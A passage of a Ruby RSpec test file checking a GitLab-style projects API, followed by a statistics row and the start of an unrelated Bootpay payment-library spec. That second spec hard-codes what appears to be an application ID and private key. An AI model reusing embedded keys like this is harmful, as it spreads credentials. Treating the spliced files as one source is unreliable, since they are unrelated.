.not_to change { Project.count }
expect(response).to have_http_status(400)
expect(json_response['error']).to eq('name is missing')
end
it 'assigns attributes to project' do
project = attributes_for(:project, {
issues_enabled: false,
merge_requests_enabled: false,
wiki_enabled: false,
request_access_enabled: true
})
post api("/projects/user/#{user.id}", admin), project
expect(response).to have_http_status(201)
project.each_pair do |k, v|
next if %i[has_external_issue_tracker path].include?(k)
expect(json_response[k.to_s]).to eq(v)
end
end
it 'sets a project as public' do
project = attributes_for(:project, visibility: 'public')
post api("/projects/user/#{user.id}", admin), project
expect(response).to have_http_status(201)
expect(json_response['visibility']).to eq('public')
end
it 'sets a project as internal' do
project = attributes_for(:project, visibility: 'internal')
post api("/projects/user/#{user.id}", admin), project
expect(response).to have_http_status(201)
expect(json_response['visibility']).to eq('internal')
end
it 'sets a project as private' do
project = attributes_for(:project, visibility: 'private')
post api("/projects/user/#{user.id}", admin), project
expect(json_response['visibility']).to eq('private')
end
it 'sets a project as allowing outdated diff discussions to automatically resolve' do
project = attributes_for(:project, resolve_outdated_diff_discussions: false)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['resolve_outdated_diff_discussions']).to be_falsey
end
it 'sets a project as allowing outdated diff discussions to automatically resolve' do
project = attributes_for(:project, resolve_outdated_diff_discussions: true)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['resolve_outdated_diff_discussions']).to be_truthy
end
it 'sets a project as allowing merge even if build fails' do
project = attributes_for(:project, only_allow_merge_if_pipeline_succeeds: false)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to be_falsey
end
it 'sets a project as allowing merge only if pipeline succeeds' do
project = attributes_for(:project, only_allow_merge_if_pipeline_succeeds: true)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to be_truthy
end
it 'sets a project as allowing merge even if discussions are unresolved' do
project = attributes_for(:project, only_allow_merge_if_all_discussions_are_resolved: false)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to be_falsey
end
it 'sets a project as allowing merge only if all discussions are resolved' do
project = attributes_for(:project, only_allow_merge_if_all_discussions_are_resolved: true)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to be_truthy
end
end
describe "POST /projects/:id/uploads" do
before do
project
end
it "uploads the file and returns its info" do
post api("/projects/#{project.id}/uploads", user), file: fixture_file_upload(Rails.root + "spec/fixtures/dk.png", "image/png")
expect(response).to have_http_status(201)
expect(json_response['alt']).to eq("dk")
expect(json_response['url']).to start_with("/uploads/")
expect(json_response['url']).to end_with("/dk.png")
end
end
describe 'GET /projects/:id' do
context 'when unauthenticated' do
it 'returns the public projects' do
public_project = create(:project, :public)
get api("/projects/#{public_project.id}")
expect(response).to have_http_status(200)
expect(json_response['id']).to eq(public_project.id)
expect(json_response['description']).to eq(public_project.description)
expect(json_response['default_branch']).to eq(public_project.default_branch)
expect(json_response.keys).not_to include('permissions')
end
end
context 'when authenticated as an admin' do
it 'returns a project by id including repository_storage' do
project
project_member
group = create(:group)
link = create(:project_group_link, project: project, group: group)
get api("/projects/#{project.id}", admin)
expect(response).to have_http_status(200)
expect(json_response['id']).to eq(project.id)
expect(json_response['description']).to eq(project.description)
expect(json_response['default_branch']).to eq(project.default_branch)
expect(json_response['tag_list']).to be_an Array
expect(json_response['archived']).to be_falsey
expect(json_response['visibility']).to be_present
expect(json_response['ssh_url_to_repo']).to be_present
expect(json_response['http_url_to_repo']).to be_present
expect(json_response['web_url']).to be_present
expect(json_response['owner']).to be_a Hash
expect(json_response['owner']).to be_a Hash
expect(json_response['name']).to eq(project.name)
expect(json_response['path']).to be_present
expect(json_response['issues_enabled']).to be_present
expect(json_response['merge_requests_enabled']).to be_present
expect(json_response['wiki_enabled']).to be_present
expect(json_response['jobs_enabled']).to be_present
expect(json_response['snippets_enabled']).to be_present
expect(json_response['container_registry_enabled']).to be_present
expect(json_response['created_at']).to be_present
expect(json_response['last_activity_at']).to be_present
expect(json_response['shared_runners_enabled']).to be_present
expect(json_response['creator_id']).to be_present
expect(json_response['namespace']).to be_present
expect(json_response['avatar_url']).to be_nil
expect(json_response['star_count']).to be_present
expect(json_response['forks_count']).to be_present
expect(json_response['public_jobs']).to be_present
expect(json_response['shared_with_groups']).to be_an Array
expect(json_response['shared_with_groups'].length).to eq(1)
expect(json_response['shared_with_groups'][0]['group_id']).to eq(group.id)
expect(json_response['shared_with_groups'][0]['group_name']).to eq(group.name)
expect(json_response['shared_with_groups'][0]['group_access_level']).to eq(link.group_access)
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to eq(project.only_allow_merge_if_pipeline_succeeds)
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to eq(project.only_allow_merge_if_all_discussions_are_resolved)
expect(json_response['repository_storage']).to eq(project.repository_storage)
end
end
context 'when authenticated as a regular user' do
before do
project
project_member
end
it 'returns a project by id' do
group = create(:group)
link = create(:project_group_link, project: project, group: group)
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response['id']).to eq(project.id)
expect(json_response['description']).to eq(project.description)
expect(json_response['default_branch']).to eq(project.default_branch)
expect(json_response['tag_list']).to be_an Array
expect(json_response['archived']).to be_falsey
expect(json_response['visibility']).to be_present
expect(json_response['ssh_url_to_repo']).to be_present
expect(json_response['http_url_to_repo']).to be_present
expect(json_response['web_url']).to be_present
expect(json_response['owner']).to be_a Hash
expect(json_response['owner']).to be_a Hash
expect(json_response['name']).to eq(project.name)
expect(json_response['path']).to be_present
expect(json_response['issues_enabled']).to be_present
expect(json_response['merge_requests_enabled']).to be_present
expect(json_response['wiki_enabled']).to be_present
expect(json_response['jobs_enabled']).to be_present
expect(json_response['snippets_enabled']).to be_present
expect(json_response['resolve_outdated_diff_discussions']).to eq(project.resolve_outdated_diff_discussions)
expect(json_response['container_registry_enabled']).to be_present
expect(json_response['created_at']).to be_present
expect(json_response['last_activity_at']).to be_present
expect(json_response['shared_runners_enabled']).to be_present
expect(json_response['creator_id']).to be_present
expect(json_response['namespace']).to be_present
expect(json_response['import_status']).to be_present
expect(json_response).to include("import_error")
expect(json_response['avatar_url']).to be_nil
expect(json_response['star_count']).to be_present
expect(json_response['forks_count']).to be_present
expect(json_response['public_jobs']).to be_present
expect(json_response['ci_config_path']).to be_nil
expect(json_response['shared_with_groups']).to be_an Array
expect(json_response['shared_with_groups'].length).to eq(1)
expect(json_response['shared_with_groups'][0]['group_id']).to eq(group.id)
expect(json_response['shared_with_groups'][0]['group_name']).to eq(group.name)
expect(json_response['shared_with_groups'][0]['group_access_level']).to eq(link.group_access)
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to eq(project.only_allow_merge_if_pipeline_succeeds)
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to eq(project.only_allow_merge_if_all_discussions_are_resolved)
expect(json_response).not_to have_key('repository_storage')
end
it 'returns a project by path name' do
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response['name']).to eq(project.name)
end
it 'returns a 404 error if not found' do
get api('/projects/42', user)
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 Project Not Found')
end
it 'returns a 404 error if user is not a member' do
other_user = create(:user)
get api("/projects/#{project.id}", other_user)
expect(response).to have_http_status(404)
end
it 'handles users with dots' do
dot_user = create(:user, username: 'dot.user')
project = create(:project, creator_id: dot_user.id, namespace: dot_user.namespace)
get api("/projects/#{CGI.escape(project.full_path)}", dot_user)
expect(response).to have_http_status(200)
expect(json_response['name']).to eq(project.name)
end
it 'exposes namespace fields' do
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response['namespace']).to eq({
'id' => user.namespace.id,
'name' => user.namespace.name,
'path' => user.namespace.path,
'kind' => user.namespace.kind,
'full_path' => user.namespace.full_path,
'parent_id' => nil,
'plan' => nil
})
end
it "does not include statistics by default" do
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response).not_to include 'statistics'
end
it "includes statistics if requested" do
get api("/projects/#{project.id}", user), statistics: true
expect(response).to have_http_status(200)
expect(json_response).to include 'statistics'
end
it "includes import_error if user can admin project" do
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response).to include("import_error")
end
it "does not include import_error if user cannot admin project" do
get api("/projects/#{project.id}", user3)
expect(response).to have_http_status(200)
expect(json_response).not_to include("import_error")
end
context 'links exposure' do
it 'exposes related resources full URIs' do
get api("/projects/#{project.id}", user)
links = json_response['_links']
expect(links['self']).to end_with("/api/v4/projects/#{project.id}")
expect(links['issues']).to end_with("/api/v4/projects/#{project.id}/issues")
expect(links['merge_requests']).to end_with("/api/v4/projects/#{project.id}/merge_requests")
expect(links['repo_branches']).to end_with("/api/v4/projects/#{project.id}/repository/branches")
expect(links['labels']).to end_with("/api/v4/projects/#{project.id}/labels")
expect(links['events']).to end_with("/api/v4/projects/#{project.id}/events")
expect(links['members']).to end_with("/api/v4/projects/#{project.id}/members")
end
it 'filters related URIs when their feature is not enabled' do
project = create(:project, :public,
:merge_requests_disabled,
:issues_disabled,
creator_id: user.id,
namespace: user.namespace)
get api("/projects/#{project.id}", user)
links = json_response['_links']
expect(links.has_key?('merge_requests')).to be_falsy
expect(links.has_key?('issues')).to be_falsy
expect(links['self']).to end_with("/api/v4/projects/#{project.id}")
end
end
describe 'permissions' do
context 'all projects' do
before do
project.team << [user, :master]
end
it 'contains permission information' do
get api("/projects", user)
expect(response).to have_http_status(200)
expect(json_response.first['permissions']['project_access']['access_level'])
.to eq(Gitlab::Access::MASTER)
expect(json_response.first['permissions']['group_access']).to be_nil
end
end
context 'personal project' do
it 'sets project access and returns 200' do
project.team << [user, :master]
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response['permissions']['project_access']['access_level'])
.to eq(Gitlab::Access::MASTER)
expect(json_response['permissions']['group_access']).to be_nil
end
end
context 'group project' do
let(:project2) { create(:project, group: create(:group)) }
before do
project2.group.add_owner(user)
end
it 'sets the owner and return 200' do
get api("/projects/#{project2.id}", user)
expect(response).to have_http_status(200)
expect(json_response['permissions']['project_access']).to be_nil
expect(json_response['permissions']['group_access']['access_level'])
.to eq(Gitlab::Access::OWNER)
end
end
end
end
end
describe 'GET /projects/:id/users' do
shared_examples_for 'project users response' do
it 'returns the project users' do
get api("/projects/#{project.id}/users", current_user)
user = project.namespace.owner
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.size).to eq(1)
first_user = json_response.first
expect(first_user['username']).to eq(user.username)
expect(first_user['name']).to eq(user.name)
expect(first_user.keys).to contain_exactly(*%w[name username id state avatar_url web_url])
end
end
context 'when unauthenticated' do
it_behaves_like 'project users response' do
let(:project) { create(:project, :public) }
let(:current_user) { nil }
end
end
context 'when authenticated' do
context 'valid request' do
it_behaves_like 'project users response' do
let(:current_user) { user }
end
end
it 'returns a 404 error if not found' do
get api('/projects/42/users', user)
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 Project Not Found')
end
it 'returns a 404 error if user is not a member' do
other_user = create(:user)
get api("/projects/#{project.id}/users", other_user)
expect(response).to have_http_status(404)
end
end
end
describe 'GET /projects/:id/snippets' do
before do
snippet
end
it 'returns an array of project snippets' do
get api("/projects/#{project.id}/snippets", user)
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first['title']).to eq(snippet.title)
end
end
describe 'GET /projects/:id/snippets/:snippet_id' do
it 'returns a project snippet' do
get api("/projects/#{project.id}/snippets/#{snippet.id}", user)
expect(response).to have_http_status(200)
expect(json_response['title']).to eq(snippet.title)
end
it 'returns a 404 error if snippet id not found' do
get api("/projects/#{project.id}/snippets/1234", user)
expect(response).to have_http_status(404)
end
end
describe 'POST /projects/:id/snippets' do
it 'creates a new project snippet' do
post api("/projects/#{project.id}/snippets", user),
title: 'api test', file_name: 'sample.rb', code: 'test', visibility: 'private'
expect(response).to have_http_status(201)
expect(json_response['title']).to eq('api test')
end
it 'returns a 400 error if invalid snippet is given' do
post api("/projects/#{project.id}/snippets", user)
expect(status).to eq(400)
end
end
describe 'PUT /projects/:id/snippets/:snippet_id' do
it 'updates an existing project snippet' do
put api("/projects/#{project.id}/snippets/#{snippet.id}", user),
code: 'updated code'
expect(response).to have_http_status(200)
expect(json_response['title']).to eq('example')
expect(snippet.reload.content).to eq('updated code')
end
it 'updates an existing project snippet with new title' do
put api("/projects/#{project.id}/snippets/#{snippet.id}", user),
title: 'other api test'
expect(response).to have_http_status(200)
expect(json_response['title']).to eq('other api test')
end
end
describe 'DELETE /projects/:id/snippets/:snippet_id' do
before do
snippet
end
it 'deletes existing project snippet' do
expect do
delete api("/projects/#{project.id}/snippets/#{snippet.id}", user)
expect(response).to have_http_status(204)
end.to change { Snippet.count }.by(-1)
end
it 'returns 404 when deleting unknown snippet id' do
delete api("/projects/#{project.id}/snippets/1234", user)
expect(response).to have_http_status(404)
end
it_behaves_like '412 response' do
let(:request) { api("/projects/#{project.id}/snippets/#{snippet.id}", user) }
end
end
describe 'GET /projects/:id/snippets/:snippet_id/raw' do
it 'gets a raw project snippet' do
get api("/projects/#{project.id}/snippets/#{snippet.id}/raw", user)
expect(response).to have_http_status(200)
end
it 'returns a 404 error if raw project snippet not found' do
get api("/projects/#{project.id}/snippets/5555/raw", user)
expect(response).to have_http_status(404)
end
end
describe 'fork management' do
let(:project_fork_target) { create(:project) }
let(:project_fork_source) { create(:project, :public) }
describe 'POST /projects/:id/fork/:forked_from_id' do
let(:new_project_fork_source) { create(:project, :public) }
it "is not available for non admin users" do
post api("/projects/#{project_fork_target.id}/fork/#{project_fork_source.id}", user)
expect(response).to have_http_status(403)
end
it 'allows project to be forked from an existing project' do
expect(project_fork_target.forked?).not_to be_truthy
post api("/projects/#{project_fork_target.id}/fork/#{project_fork_source.id}", admin)
expect(response).to have_http_status(201)
project_fork_target.reload
expect(project_fork_target.forked_from_project.id).to eq(project_fork_source.id)
expect(project_fork_target.forked_project_link).not_to be_nil
expect(project_fork_target.forked?).to be_truthy
end
it 'refreshes the forks count cachce' do
expect(project_fork_source.forks_count).to be_zero
post api("/projects/#{project_fork_target.id}/fork/#{project_fork_source.id}", admin)
expect(project_fork_source.forks_count).to eq(1)
end
it 'fails if forked_from project which does not exist' do
post api("/projects/#{project_fork_target.id}/fork/9999", admin)
expect(response).to have_http_status(404)
end
it 'fails with 409 if already forked' do
post api("/projects/#{project_fork_target.id}/fork/#{project_fork_source.id}", admin)
project_fork_target.reload
expect(project_fork_target.forked_from_project.id).to eq(project_fork_source.id)
post api("/projects/#{project_fork_target.id}/fork/#{new_project_fork_source.id}", admin)
expect(response).to have_http_status(409)
project_fork_target.reload
expect(project_fork_target.forked_from_project.id).to eq(project_fork_source.id)
expect(project_fork_target.forked?).to be_truthy
end
end
describe 'DELETE /projects/:id/fork' do
it "is not visible to users outside group" do
delete api("/projects/#{project_fork_target.id}/fork", user)
expect(response).to have_http_status(404)
end
context 'when users belong to project group' do
let(:project_fork_target) { create(:project, group: create(:group)) }
before do
project_fork_target.group.add_owner user
project_fork_target.group.add_developer user2
end
context 'for a forked project' do
before do
post api("/projects/#{project_fork_target.id}/fork/#{project_fork_source.id}", admin)
project_fork_target.reload
expect(project_fork_target.forked_from_project).not_to be_nil
expect(project_fork_target.forked?).to be_truthy
end
it 'makes forked project unforked' do
delete api("/projects/#{project_fork_target.id}/fork", admin)
expect(response).to have_http_status(204)
project_fork_target.reload
expect(project_fork_target.forked_from_project).to be_nil
expect(project_fork_target.forked?).not_to be_truthy
end
it_behaves_like '412 response' do
let(:request) { api("/projects/#{project_fork_target.id}/fork", admin) }
end
end
it 'is forbidden to non-owner users' do
delete api("/projects/#{project_fork_target.id}/fork", user2)
expect(response).to have_http_status(403)
end
it 'is idempotent if not forked' do
expect(project_fork_target.forked_from_project).to be_nil
delete api("/projects/#{project_fork_target.id}/fork", admin)
expect(response).to have_http_status(304)
expect(project_fork_target.reload.forked_from_project).to be_nil
end
end
end
end
describe "POST /projects/:id/share" do
let(:group) { create(:group) }
it "shares project with group" do
expires_at = 10.days.from_now.to_date
expect do
post api("/projects/#{project.id}/share", user), group_id: group.id, group_access: Gitlab::Access::DEVELOPER, expires_at: expires_at
end.to change { ProjectGroupLink.count }.by(1)
expect(response).to have_http_status(201)
expect(json_response['group_id']).to eq(group.id)
expect(json_response['group_access']).to eq(Gitlab::Access::DEVELOPER)
expect(json_response['expires_at']).to eq(expires_at.to_s)
end
it "returns a 400 error when group id is not given" do
post api("/projects/#{project.id}/share", user), group_access: Gitlab::Access::DEVELOPER
expect(response).to have_http_status(400)
end
it "returns a 400 error when access level is not given" do
post api("/projects/#{project.id}/share", user), group_id: group.id
expect(response).to have_http_status(400)
end
it "returns a 400 error when sharing is disabled" do
project.namespace.update(share_with_group_lock: true)
post api("/projects/#{project.id}/share", user), group_id: group.id, group_access: Gitlab::Access::DEVELOPER
expect(response).to have_http_status(400)
end
it 'returns a 404 error when user cannot read group' do
private_group = create(:group, :private)
post api("/projects/#{project.id}/share", user), group_id: private_group.id, group_access: Gitlab::Access::DEVELOPER
expect(response).to have_http_status(404)
end
it 'returns a 404 error when group does not exist' do
post api("/projects/#{project.id}/share", user), group_id: 1234, group_access: Gitlab::Access::DEVELOPER
expect(response).to have_http_status(404)
end
it "returns a 400 error when wrong params passed" do
post api("/projects/#{project.id}/share", user), group_id: group.id, group_access: 1234
expect(response).to have_http_status(400)
expect(json_response['error']).to eq 'group_access does not have a valid value'
end
end
describe 'DELETE /projects/:id/share/:group_id' do
context 'for a valid group' do
let(:group) { create(:group, :public) }
before do
create(:project_group_link, group: group, project: project)
end
it 'returns 204 when deleting a group share' do
delete api("/projects/#{project.id}/share/#{group.id}", user)
expect(response).to have_http_status(204)
expect(project.project_group_links).to be_empty
end
it 'returns 204 when deleting a group share' do
delete api("/projects/#{project.id}/share/#{group.id}", user)
expect(response).to have_http_status(204)
expect(project.project_group_links).to be_empty
end
it_behaves_like '412 response' do
let(:request) { api("/projects/#{project.id}/share/#{group.id}", user) }
end
end
it 'returns a 400 when group id is not an integer' do
delete api("/projects/#{project.id}/share/foo", user)
expect(response).to have_http_status(400)
end
it 'returns a 404 error when group link does not exist' do
delete api("/projects/#{project.id}/share/1234", user)
expect(response).to have_http_status(404)
end
it 'returns a 404 error when project does not exist' do
delete api("/projects/123/share/1234", user)
expect(response).to have_http_status(404)
end
end
describe 'PUT /projects/:id' do
before do
expect(project).to be_persisted
expect(user).to be_persisted
expect(user3).to be_persisted
expect(user4).to be_persisted
expect(project3).to be_persisted
expect(project4).to be_persisted
expect(project_member2).to be_persisted
expect(project_member).to be_persisted
end
it 'returns 400 when nothing sent' do
project_param = {}
put api("/projects/#{project.id}", user), project_param
expect(response).to have_http_status(400)
expect(json_response['error']).to match('at least one parameter must be provided')
end
context 'when unauthenticated' do
it 'returns authentication error' do
project_param = { name: 'bar' }
put api("/projects/#{project.id}"), project_param
expect(response).to have_http_status(401)
end
end
context 'when authenticated as project owner' do
it 'updates name' do
project_param = { name: 'bar' }
put api("/projects/#{project.id}", user), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
it 'updates visibility_level' do
project_param = { visibility: 'public' }
put api("/projects/#{project3.id}", user), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
it 'updates visibility_level from public to private' do
project3.update_attributes({ visibility_level: Gitlab::VisibilityLevel::PUBLIC })
project_param = { visibility: 'private' }
put api("/projects/#{project3.id}", user), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
expect(json_response['visibility']).to eq('private')
end
it 'does not update name to existing name' do
project_param = { name: project3.name }
put api("/projects/#{project.id}", user), project_param
expect(response).to have_http_status(400)
expect(json_response['message']['name']).to eq(['has already been taken'])
end
it 'updates request_access_enabled' do
project_param = { request_access_enabled: false }
put api("/projects/#{project.id}", user), project_param
expect(response).to have_http_status(200)
expect(json_response['request_access_enabled']).to eq(false)
end
it 'updates approvals_before_merge' do
project_param = { approvals_before_merge: 3 }
put api("/projects/#{project.id}", user), project_param
expect(response).to have_http_status(200)
expect(json_response['approvals_before_merge']).to eq(3)
end
it 'updates path & name to existing path & name in different namespace' do
project_param = { path: project4.path, name: project4.name }
put api("/projects/#{project3.id}", user), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
it 'updates jobs_enabled' do
project_param = { jobs_enabled: true }
put api("/projects/#{project3.id}", user), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
end
context 'when authenticated as project master' do
it 'updates path' do
project_param = { path: 'bar' }
put api("/projects/#{project3.id}", user4), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
it 'updates other attributes' do
project_param = { issues_enabled: true,
wiki_enabled: true,
snippets_enabled: true,
merge_requests_enabled: true,
description: 'new description' }
put api("/projects/#{project3.id}", user4), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
it 'does not update path to existing path' do
project_param = { path: project.path }
put api("/projects/#{project3.id}", user4), project_param
expect(response).to have_http_status(400)
expect(json_response['message']['path']).to eq(['has already been taken'])
end
it 'does not update name' do
project_param = { name: 'bar' }
put api("/projects/#{project3.id}", user4), project_param
expect(response).to have_http_status(403)
end
it 'does not update visibility_level' do
project_param = { visibility: 'public' }
put api("/projects/#{project3.id}", user4), project_param
expect(response).to have_http_status(403)
end
end
context 'when authenticated as project developer' do
it 'does not update other attributes' do
project_param = { path: 'bar',
issues_enabled: true,
wiki_enabled: true,
snippets_enabled: true,
merge_requests_enabled: true,
description: 'new description',
request_access_enabled: true }
put api("/projects/#{project.id}", user3), project_param
expect(response).to have_http_status(403)
end
end
end
describe 'POST /projects/:id/archive' do
context 'on an unarchived project' do
it 'archives the project' do
post api("/projects/#{project.id}/archive", user)
expect(response).to have_http_status(201)
expect(json_response['archived']).to be_truthy
end
end
context 'on an archived project' do
before do
project.archive!
end
it 'remains archived' do
post api("/projects/#{project.id}/archive", user)
expect(response).to have_http_status(201)
expect(json_response['archived']).to be_truthy
end
end
context 'user without archiving rights to the project' do
before do
project.team << [user3, :developer]
end
it 'rejects the action' do
post api("/projects/#{project.id}/archive", user3)
expect(response).to have_http_status(403)
end
end
end
describe 'POST /projects/:id/unarchive' do
context 'on an unarchived project' do
it 'remains unarchived' do
post api("/projects/#{project.id}/unarchive", user)
expect(response).to have_http_status(201)
expect(json_response['archived']).to be_falsey
end
end
context 'on an archived project' do
before do
project.archive!
end
it 'unarchives the project' do
post api("/projects/#{project.id}/unarchive", user)
expect(response).to have_http_status(201)
expect(json_response['archived']).to be_falsey
end
end
context 'user without archiving rights to the project' do
before do
project.team << [user3, :developer]
end
it 'rejects the action' do
post api("/projects/#{project.id}/unarchive", user3)
expect(response).to have_http_status(403)
end
end
end
describe 'POST /projects/:id/star' do
context 'on an unstarred project' do
it 'stars the project' do
expect { post api("/projects/#{project.id}/star", user) }.to change { project.reload.star_count }.by(1)
expect(response).to have_http_status(201)
expect(json_response['star_count']).to eq(1)
end
end
context 'on a starred project' do
before do
user.toggle_star(project)
project.reload
end
it 'does not modify the star count' do
expect { post api("/projects/#{project.id}/star", user) }.not_to change { project.reload.star_count }
expect(response).to have_http_status(304)
end
end
end
describe 'POST /projects/:id/unstar' do
context 'on a starred project' do
before do
user.toggle_star(project)
project.reload
end
it 'unstars the project' do
expect { post api("/projects/#{project.id}/unstar", user) }.to change { project.reload.star_count }.by(-1)
expect(response).to have_http_status(201)
expect(json_response['star_count']).to eq(0)
end
end
context 'on an unstarred project' do
it 'does not modify the star count' do
expect { post api("/projects/#{project.id}/unstar", user) }.not_to change { project.reload.star_count }
expect(response).to have_http_status(304)
end
end
end
describe 'DELETE /projects/:id' do
context 'when authenticated as user' do
it 'removes project' do
delete api("/projects/#{project.id}", user)
expect(response).to have_http_status(202)
expect(json_response['message']).to eql('202 Accepted')
end
it_behaves_like '412 response' do
let(:success_status) { 202 }
let(:request) { api("/projects/#{project.id}", user) }
end
it 'does not remove a project if not an owner' do
user3 = create(:user)
project.team << [user3, :developer]
delete api("/projects/#{project.id}", user3)
expect(response).to have_http_status(403)
end
it 'does not remove a non existing project' do
delete api('/projects/1328', user)
expect(response).to have_http_status(404)
end
it 'does not remove a project not attached to user' do
delete api("/projects/#{project.id}", user2)
expect(response).to have_http_status(404)
end
end
context 'when authenticated as admin' do
it 'removes any existing project' do
delete api("/projects/#{project.id}", admin)
expect(response).to have_http_status(202)
expect(json_response['message']).to eql('202 Accepted')
end
it 'does not remove a non existing project' do
delete api('/projects/1328', admin)
expect(response).to have_http_status(404)
end
it_behaves_like '412 response' do
let(:success_status) { 202 }
let(:request) { api("/projects/#{project.id}", admin) }
end
end
end
describe 'POST /projects/:id/fork' do
let(:project) do
create(:project, :repository, creator: user, namespace: user.namespace)
end
let(:group) { create(:group) }
let(:group2) do
group = create(:group, name: 'group2_name')
group.add_owner(user2)
group
end
before do
project.add_reporter(user2)
end
context 'when authenticated' do
it 'forks if user has sufficient access to project' do
post api("/projects/#{project.id}/fork", user2)
expect(response).to have_http_status(201)
expect(json_response['name']).to eq(project.name)
expect(json_response['path']).to eq(project.path)
expect(json_response['owner']['id']).to eq(user2.id)
expect(json_response['namespace']['id']).to eq(user2.namespace.id)
expect(json_response['forked_from_project']['id']).to eq(project.id)
expect(json_response['import_status']).to eq('scheduled')
expect(json_response).to include("import_error")
end
it 'forks if user is admin' do
post api("/projects/#{project.id}/fork", admin)
expect(response).to have_http_status(201)
expect(json_response['name']).to eq(project.name)
expect(json_response['path']).to eq(project.path)
expect(json_response['owner']['id']).to eq(admin.id)
expect(json_response['namespace']['id']).to eq(admin.namespace.id)
expect(json_response['forked_from_project']['id']).to eq(project.id)
expect(json_response['import_status']).to eq('scheduled')
expect(json_response).to include("import_error")
end
it 'fails on missing project access for the project to fork' do
new_user = create(:user)
post api("/projects/#{project.id}/fork", new_user)
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 Project Not Found')
end
it 'fails if forked project exists in the user namespace' do
post api("/projects/#{project.id}/fork", user)
expect(response).to have_http_status(409)
expect(json_response['message']['name']).to eq(['has already been taken'])
expect(json_response['message']['path']).to eq(['has already been taken'])
end
it 'fails if project to fork from does not exist' do
post api('/projects/424242/fork', user)
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 Project Not Found')
end
it 'forks with explicit own user namespace id' do
post api("/projects/#{project.id}/fork", user2), namespace: user2.namespace.id
expect(response).to have_http_status(201)
expect(json_response['owner']['id']).to eq(user2.id)
end
it 'forks with explicit own user name as namespace' do
post api("/projects/#{project.id}/fork", user2), namespace: user2.username
expect(response).to have_http_status(201)
expect(json_response['owner']['id']).to eq(user2.id)
end
it 'forks to another user when admin' do
post api("/projects/#{project.id}/fork", admin), namespace: user2.username
expect(response).to have_http_status(201)
expect(json_response['owner']['id']).to eq(user2.id)
end
it 'fails if trying to fork to another user when not admin' do
post api("/projects/#{project.id}/fork", user2), namespace: admin.namespace.id
expect(response).to have_http_status(404)
end
it 'fails if trying to fork to non-existent namespace' do
post api("/projects/#{project.id}/fork", user2), namespace: 42424242
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 Target Namespace Not Found')
end
it 'forks to owned group' do
post api("/projects/#{project.id}/fork", user2), namespace: group2.name
expect(response).to have_http_status(201)
expect(json_response['namespace']['name']).to eq(group2.name)
end
it 'fails to fork to not owned group' do
post api("/projects/#{project.id}/fork", user2), namespace: group.name
expect(response).to have_http_status(404)
end
it 'forks to not owned group when admin' do
post api("/projects/#{project.id}/fork", admin), namespace: group.name
expect(response).to have_http_status(201)
expect(json_response['namespace']['name']).to eq(group.name)
end
end
context 'when unauthenticated' do
it 'returns authentication error' do
post api("/projects/#{project.id}/fork")
expect(response).to have_http_status(401)
expect(json_response['message']).to eq('401 Unauthorized')
end
end
end
describe 'POST /projects/:id/housekeeping' do
let(:housekeeping) { Projects::HousekeepingService.new(project) }
before do
allow(Projects::HousekeepingService).to receive(:new).with(project).and_return(housekeeping)
end
context 'when authenticated as owner' do
it 'starts the housekeeping process' do
expect(housekeeping).to receive(:execute).once
post api("/projects/#{project.id}/housekeeping", user)
expect(response).to have_http_status(201)
end
context 'when housekeeping lease is taken' do
it 'returns conflict' do
expect(housekeeping).to receive(:execute).once.and_raise(Projects::HousekeepingService::LeaseTaken)
post api("/projects/#{project.id}/housekeeping", user)
expect(response).to have_http_status(409)
expect(json_response['message']).to match(/Somebody already triggered housekeeping for this project/)
end
end
end
context 'when authenticated as developer' do
before do
project_member
end
it 'returns forbidden error' do
post api("/projects/#{project.id}/housekeeping", user3)
expect(response).to have_http_status(403)
end
end
context 'when unauthenticated' do
it 'returns authentication error' do
post api("/projects/#{project.id}/housekeeping")
expect(response).to have_http_status(401)
end
end
end
end
| 35.90107 | 145 | 0.656334 |
0181811db077244a82a78c7abdec70cc6444c399 | 1,611 | require "spec_helper"
RSpec.describe Bootpay do
it 'remote form' do
bootpay = Bootpay::ServerApi.new(
'5b9f51264457636ab9a07cde',
'sfilSOSVakw+PZA+PRux4Iuwm7a//9CXXudCq9TMDHk=',
:development
)
result = bootpay.remote_form(
{
pg: 'danal',
fm: ['card', 'phone'],
n: '테스트 결제', # 상품명
o_key: 'unique_value_1234', # 가맹점의 상품 고유 키
